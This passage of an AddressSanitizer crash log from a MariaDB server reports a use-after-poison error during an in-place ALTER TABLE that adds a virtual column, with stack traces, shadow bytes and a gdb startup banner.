    #4 0x55a3176a67d2 in mysql\_alter\_table(THD\*, st\_mysql\_const\_lex\_string const\*, st\_mysql\_const\_lex\_string const\*, HA\_CREATE\_INFO\*, TABLE\_LIST\*, Alter\_info\*, unsigned int, st\_order\*, bool, bool) /experiment/mariadb-server/sql/sql\_table.cc:10205

    #5 0x55a3177fcf99 in Sql\_cmd\_alter\_table::execute(THD\*) /experiment/mariadb-server/sql/sql\_alter.cc:550

    #6 0x55a31741717f in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:5997

    #7 0x55a3174245a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #8 0x55a31742a60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #9 0x55a31742f73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #10 0x55a3177eae56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #11 0x55a3177eb33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #12 0x55a31827bc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #13 0x7f4812443258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

    #14 0x7f4811fee5e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

0x6190000d6d60 is located 480 bytes inside of 1152-byte region \[0x6190000d6b80,0x6190000d7000)

allocated by thread T14 here:

    #0 0x7f4812ad5279 in \_\_interceptor\_malloc /build/gcc/src/gcc/libsanitizer/asan/asan\_malloc\_linux.cpp:145

    #1 0x55a3185c76c0 in ut\_allocator<unsigned char, true>::allocate(unsigned long, unsigned char const\*, unsigned int, bool, bool) /experiment/mariadb-server/storage/innobase/include/ut0new.h:375

    #2 0x55a3185c76c0 in mem\_heap\_create\_block\_func(mem\_block\_info\_t\*, unsigned long, unsigned long) /experiment/mariadb-server/storage/innobase/mem/mem0mem.cc:277

    #3 0x55a3184da801 in mem\_heap\_create\_func /experiment/mariadb-server/storage/innobase/include/mem0mem.ic:377

    #4 0x55a3184da801 in ha\_innobase::prepare\_inplace\_alter\_table(TABLE\*, Alter\_inplace\_info\*) /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:7816

    #5 0x55a3176a67d2 in mysql\_inplace\_alter\_table /experiment/mariadb-server/sql/sql\_table.cc:7326

    #6 0x55a3176a67d2 in mysql\_alter\_table(THD\*, st\_mysql\_const\_lex\_string const\*, st\_mysql\_const\_lex\_string const\*, HA\_CREATE\_INFO\*, TABLE\_LIST\*, Alter\_info\*, unsigned int, st\_order\*, bool, bool) /experiment/mariadb-server/sql/sql\_table.cc:10205

    #7 0x55a3177fcf99 in Sql\_cmd\_alter\_table::execute(THD\*) /experiment/mariadb-server/sql/sql\_alter.cc:550

    #8 0x55a31741717f in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:5997

    #9 0x55a3174245a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #10 0x55a31742a60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #11 0x55a31742f73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #12 0x55a3177eae56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #13 0x55a3177eb33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #14 0x55a31827bc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #15 0x7f4812443258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:

    #0 0x7f4812a76fa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

    #1 0x55a31827bea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

    #2 0x55a31827bea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55a3170ecb3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

    #4 0x55a3170ecb3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55a3170f87b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55a3170f936f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55a3170fca52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7f4811f17b24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /experiment/mariadb-server/sql/field.h:1395 in prepare\_inplace\_add\_virtual

Shadow bytes around the buggy address:

  0x0c3280012d50: f7 f7 fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c3280012d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c3280012d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c3280012d80: f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c3280012d90: 00 00 00 00 00 00 f7 00 00 00 00 00 00 00 00 00

\=>0x0c3280012da0: 00 00 00 00 00 00 00 00 00 00 00 f7\[f7\]f7 f7 f7

  0x0c3280012db0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012dc0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012dd0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012de0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012df0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07 

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

\==2119277==ABORTING

GNU gdb (GDB) 10.2

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

(gdb) (gdb) (gdb) quit

Tag

#sql